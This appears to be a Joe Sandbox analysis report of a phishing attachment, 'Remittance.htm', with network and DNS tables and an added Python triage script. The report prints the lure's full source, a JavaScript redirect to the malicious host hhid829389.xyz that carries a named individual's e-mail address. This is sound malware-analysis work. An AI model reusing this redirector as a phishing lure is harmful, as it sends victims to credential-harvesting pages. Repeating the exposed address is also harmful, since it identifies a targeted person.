Windows
Analysis Report
Remittance.htm
Overview
General Information
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 5676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- chrome.exe (PID: 5840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1712,i,1373269792511892383,14833017251772175095,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- chrome.exe (PID: 2040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Remittance.htm" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup
Source: | Directory created: |
Networking |
---|
Signature | Rows (the Source column of these rows is empty in this export)
---|---
DNS query | 1
IP Address | 2
DNS traffic detected | 1
Network traffic detected | 44
HTTP traffic detected | 24
String found in binary or memory | 1
System Summary |
---|
Signature | Rows
---|---
Initial sample | 1
Classification label | 1
Process created | 35
File created | 1
Window detected | 1
Directory created | 1
MITRE ATT&CK matrix, techniques with matching signatures only (the number is the count shown in the report's matrix):
- Privilege Escalation: 1 Process Injection
- Defense Evasion: 2 Masquerading, 1 Process Injection
- Command and Control: 1 Encrypted Channel, 5 Non-Application Layer Protocol, 6 Application Layer Protocol, 4 Ingress Tool Transfer
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
accounts.google.com | 216.58.209.45 | true | false | high | |
hhid829389.xyz | 108.174.197.216 | true | true | | unknown |
www.google.com | 142.250.184.100 | true | false | high | |
clients.l.google.com | 142.250.180.174 | true | false | high | |
example.com | 93.184.216.34 | true | false | high | |
ianawww.vip.icann.org | 192.0.46.8 | true | false | high | |
href.li | 192.0.78.26 | true | false | high | |
www.vip.icann.org | 192.0.47.7 | true | false | high | |
clients2.google.com | unknown | unknown | false | high | |
www.iana.org | unknown | unknown | false | high | |
pti.icann.org | unknown | unknown | false | high | |
www.icann.org | unknown | unknown | false | high |
URLs (Name | Malicious | Antivirus Detection | Reputation): 22 entries, none flagged malicious; 21 with reputation high, 1 with reputation unknown. The URL names are not preserved in this export.
One further entry (Name | Source | Malicious | Antivirus Detection | Reputation): not malicious, reputation unknown; name and source are not preserved in this export.
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
192.0.46.8 | ianawww.vip.icann.org | United States | 16876 | ICANN-DCUS | false |
93.184.216.34 | example.com | European Union | 15133 | EDGECASTUS | false |
108.174.197.216 | hhid829389.xyz | United States | 54290 | HOSTWINDSUS | true |
216.58.209.45 | accounts.google.com | United States | 15169 | GOOGLEUS | false |
192.0.78.26 | href.li | United States | 2635 | AUTOMATTICUS | false |
239.255.255.250 | unknown | Reserved | unknown | unknown | false |
142.250.184.100 | www.google.com | United States | 15169 | GOOGLEUS | false |
142.250.180.174 | clients.l.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.1 |
127.0.0.1 |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 800698 |
Start date and time: | 2023-02-07 18:21:34 +01:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 35s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Cookbook file name: | defaultwindowshtmlcookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample file name: | Remittance.htm |
Detection: | MAL |
Classification: | mal48.troj.winHTM@35/0@19/10 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 142.250.184.99, 34.104.35.123, 142.250.180.163
- Excluded domains from analysis (whitelisted): edgedl.me.gvt1.com, update.googleapis.com, clientservices.googleapis.com
- Not all processes were analyzed; the report is missing behavior information
- Report size getting too big, too many NtWriteVirtualMemory calls found.
File type: | |
Entropy (8bit): | 5.255051358476731 |
TrID: | |
File name: | Remittance.htm |
File size: | 225 |
MD5: | 39bb32548e89f58ceb6960e84791979e |
SHA1: | e70af8a69f739dc0501013a1a9ebb5f4cef552e2 |
SHA256: | bf0f39c7f991c76bbd138e4d74dc9cc402aca673c5edd8b6005dc41faf739208 |
SHA512: | 18764d29c900701e18f6d7b0cf3c9fd59c0cd1a0baab510062a28e91755b5503f1bd979e720d00524ffb0d1c213b30a36a89b22e152cdf9005f925fac4c621b4 |
SSDEEP: | 6:h4QWqqMzSKcAIK7UK+oSPNKDVjgnEzcTi/MWXfGb:hPlzSb1K0NwVsEzcu/MWPGb |
TLSH: | 7AD0A7EB3C50DD056971ACF45C75E22C94B7B2C45E96E217D4C4792B15203B89D471CE |
File Content Preview: |
<!DOCTYPE html>
<html>
<body>
<script>
// Javascript URL redirection - generated by www.rapidtables.com
window.location.replace("https://hhid829389.xyz/?aoul&qrc=glenn.walker@cra-arc.gc.ca");
</script>
</body>
</html>
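Added example, not part of the Joe Sandbox report: a static triage script for one-file HTML redirectors of this kind. It rebuilds the sample from the File Content Preview above (my assumption is that the ".." separators shown in the preview are CRLF line breaks with no trailing newline; that is the only line ending for which the rebuilt file comes out at the reported 225 bytes), detects the client-side redirect primitive, and pulls out the destination host and the e-mail address the lure carries in its query string, which a credential-harvesting landing page typically uses to pre-fill the username. The hash and entropy values it returns can be compared with the MD5 and Entropy (8bit) fields of the report. The regular expressions, the function names and the extra test inputs are mine; only the Python standard library is used.

```python
"""Static triage of a one-file HTML redirector such as Remittance.htm."""
import hashlib
import math
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Rebuilt from the report's File Content Preview. Assumption: the ".."
# separators in the preview are CRLF line breaks with no trailing newline;
# that is the only choice for which the file comes out at the reported 225 bytes.
SAMPLE = b"\r\n".join([
    b"<!DOCTYPE html>",
    b"<html>",
    b"<body>",
    b"<script>",
    b"// Javascript URL redirection - generated by www.rapidtables.com",
    b'window.location.replace("https://hhid829389.xyz/?aoul&qrc=glenn.walker@cra-arc.gc.ca");',
    b"</script>",
    b"</body>",
    b"</html>",
])

# Client-side redirect primitives seen in single-file lures; group 1 is the target URL.
REDIRECT_PATTERNS = [
    ("location assignment",
     re.compile(r"""(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I)),
    ("location.replace/assign",
     re.compile(r"""location\.(?:replace|assign)\(\s*["']([^"']+)["']\s*\)""", re.I)),
    ("meta refresh",
     re.compile(r"""<meta[^>]+http-equiv=["']?refresh["']?[^>]*url=([^"'>\s]+)""", re.I)),
]
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, the measure the report calls Entropy (8bit)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def find_redirect(html):
    """Return (primitive name, target URL) for the first redirect found, or None."""
    for name, pattern in REDIRECT_PATTERNS:
        m = pattern.search(html)
        if m:
            return name, m.group(1)
    return None


def triage(sample):
    """Hashes, entropy and redirect details for one HTML sample given as bytes."""
    result = {
        "size": len(sample),
        "md5": hashlib.md5(sample).hexdigest(),
        "sha256": hashlib.sha256(sample).hexdigest(),
        "entropy": round(shannon_entropy(sample), 6),
        "redirect": None,
    }
    hit = find_redirect(sample.decode("utf-8", errors="replace"))
    if hit is None:
        return result
    kind, url = hit
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    # Phishing kits often carry the target's address in the URL so the landing
    # page can pre-fill the username; every e-mail-shaped query value is reported.
    victims = [v for values in query.values() for v in values if EMAIL_RE.match(v)]
    result["redirect"] = {
        "kind": kind,
        "url": url,
        "scheme": parts.scheme,
        "host": parts.hostname,
        "query_keys": sorted(query),
        "victim_ids": victims,
    }
    return result


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

triage(SAMPLE) classifies the redirect as location.replace/assign to hhid829389.xyz with the victim identifier glenn.walker@cra-arc.gc.ca, and the same function handles location.href assignments and meta refresh tags, which between them cover most single-file redirector lures. Because the redirect lives entirely in the page, this is a cheap pre-filter to run on .htm attachments before they are sent to a sandbox, and the extracted host is the indicator to block.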
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 7, 2023 18:22:35.514782906 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.514828920 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.514906883 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.515350103 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.515362024 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.516421080 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.516468048 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.516552925 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.516911983 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.516928911 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.597213984 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.600869894 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.603200912 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.603229046 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.603496075 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.603521109 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.604312897 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.604425907 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.605714083 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:35.605828047 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.605948925 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.606060982 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.213845968 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.213895082 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.214107037 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.214555979 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.214592934 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.214812994 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.214847088 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.214968920 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.215183973 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.215209007 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.261046886 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.261260033 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.261344910 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.261404037 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.261482000 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.281936884 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.282457113 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.282661915 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.282980919 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.308343887 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:36.308389902 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.309290886 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:36.309329987 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:36.487548113 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.487634897 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.487763882 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.488193989 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.488240004 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.788575888 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.788919926 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.788960934 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.790175915 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.790792942 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.818490982 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.818530083 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.818741083 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.818754911 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.818949938 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.984761000 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.984795094 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:37.085900068 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:38.763835907 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.763922930 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.764024973 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.810707092 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.810787916 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.880678892 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.917392015 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.917450905 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.921080112 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.921307087 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.924998999 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.925035000 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.925301075 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:38.997092009 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:38.997138023 CET | 443 | 49690 | 142.250.184.100 | 192.168.2.4 |
Feb 7, 2023 18:22:39.097035885 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:39.372406006 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:39.372523069 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:39.372613907 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:39.373567104 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:39.373591900 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:39.432368040 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.432426929 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.432523012 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.432948112 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.432964087 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.485980988 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.488847971 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.488930941 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.489515066 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.489671946 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.490298033 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.490406036 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.492759943 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.492789030 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.492934942 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
Feb 7, 2023 18:22:39.493001938 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 7, 2023 18:22:35.359690905 CET | 51600 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:35.359971046 CET | 57417 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:35.377711058 CET | 53 | 57417 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:35.377994061 CET | 53 | 51600 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:36.376741886 CET | 61105 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:36.408771038 CET | 53 | 61105 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:38.675455093 CET | 59683 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:38.696670055 CET | 53 | 59683 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:38.731987953 CET | 64167 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:38.751524925 CET | 53 | 64167 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:39.377855062 CET | 58565 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:39.398554087 CET | 53 | 58565 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:39.848314047 CET | 56807 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:39.866036892 CET | 53 | 56807 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:52.922415972 CET | 55570 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:52.941468954 CET | 53 | 55570 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:53.447417021 CET | 64906 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:53.467806101 CET | 53 | 64906 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:57.577347994 CET | 64700 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:57.581682920 CET | 56022 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:22:57.594928980 CET | 53 | 64700 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:57.773257971 CET | 53 | 56022 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:22:59.932573080 CET | 49750 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:23:00.099409103 CET | 53 | 49750 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:23:38.747319937 CET | 53370 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:23:38.765232086 CET | 53 | 53370 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:23:59.240793943 CET | 51766 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:23:59.241426945 CET | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:23:59.258929968 CET | 53 | 51766 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:23:59.588109016 CET | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:24:03.115114927 CET | 53622 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:24:03.133151054 CET | 53 | 53622 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:24:39.241616011 CET | 50065 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:24:39.262686968 CET | 53 | 50065 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:24:39.385073900 CET | 53573 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:24:39.403084040 CET | 53 | 53573 | 8.8.8.8 | 192.168.2.4 |
Feb 7, 2023 18:25:28.937002897 CET | 61366 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 7, 2023 18:25:28.954996109 CET | 53 | 61366 | 8.8.8.8 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Feb 7, 2023 18:22:35.359690905 CET | 192.168.2.4 | 8.8.8.8 | 0xa045 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:35.359971046 CET | 192.168.2.4 | 8.8.8.8 | 0x4c48 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:36.376741886 CET | 192.168.2.4 | 8.8.8.8 | 0xf521 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:38.675455093 CET | 192.168.2.4 | 8.8.8.8 | 0xdb35 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:38.731987953 CET | 192.168.2.4 | 8.8.8.8 | 0x109e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:39.377855062 CET | 192.168.2.4 | 8.8.8.8 | 0xd64b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:39.848314047 CET | 192.168.2.4 | 8.8.8.8 | 0x6456 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:52.922415972 CET | 192.168.2.4 | 8.8.8.8 | 0x6141 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:53.447417021 CET | 192.168.2.4 | 8.8.8.8 | 0x43bb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:57.577347994 CET | 192.168.2.4 | 8.8.8.8 | 0xafb5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:57.581682920 CET | 192.168.2.4 | 8.8.8.8 | 0xe24d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:22:59.932573080 CET | 192.168.2.4 | 8.8.8.8 | 0xb596 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:23:38.747319937 CET | 192.168.2.4 | 8.8.8.8 | 0x7297 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:23:59.240793943 CET | 192.168.2.4 | 8.8.8.8 | 0x4850 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:23:59.241426945 CET | 192.168.2.4 | 8.8.8.8 | 0x1dec | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:24:03.115114927 CET | 192.168.2.4 | 8.8.8.8 | 0x89fd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:24:39.241616011 CET | 192.168.2.4 | 8.8.8.8 | 0x7109 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:24:39.385073900 CET | 192.168.2.4 | 8.8.8.8 | 0x37ce | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 7, 2023 18:25:28.937002897 CET | 192.168.2.4 | 8.8.8.8 | 0x779b | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Feb 7, 2023 18:22:35.377711058 CET | 8.8.8.8 | 192.168.2.4 | 0x4c48 | No error (0) | clients.l.google.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:35.377711058 CET | 8.8.8.8 | 192.168.2.4 | 0x4c48 | No error (0) | 142.250.180.174 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:35.377994061 CET | 8.8.8.8 | 192.168.2.4 | 0xa045 | No error (0) | 216.58.209.45 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:36.408771038 CET | 8.8.8.8 | 192.168.2.4 | 0xf521 | No error (0) | 108.174.197.216 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:38.696670055 CET | 8.8.8.8 | 192.168.2.4 | 0xdb35 | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:38.751524925 CET | 8.8.8.8 | 192.168.2.4 | 0x109e | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:39.398554087 CET | 8.8.8.8 | 192.168.2.4 | 0xd64b | No error (0) | 192.0.78.26 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:39.398554087 CET | 8.8.8.8 | 192.168.2.4 | 0xd64b | No error (0) | 192.0.78.27 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:39.866036892 CET | 8.8.8.8 | 192.168.2.4 | 0x6456 | No error (0) | 93.184.216.34 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:52.941468954 CET | 8.8.8.8 | 192.168.2.4 | 0x6141 | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:52.941468954 CET | 8.8.8.8 | 192.168.2.4 | 0x6141 | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:53.467806101 CET | 8.8.8.8 | 192.168.2.4 | 0x43bb | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:53.467806101 CET | 8.8.8.8 | 192.168.2.4 | 0x43bb | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:57.594928980 CET | 8.8.8.8 | 192.168.2.4 | 0xafb5 | No error (0) | www.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:57.594928980 CET | 8.8.8.8 | 192.168.2.4 | 0xafb5 | No error (0) | 192.0.47.7 | A (IP address) | IN (0x0001) | false | ||
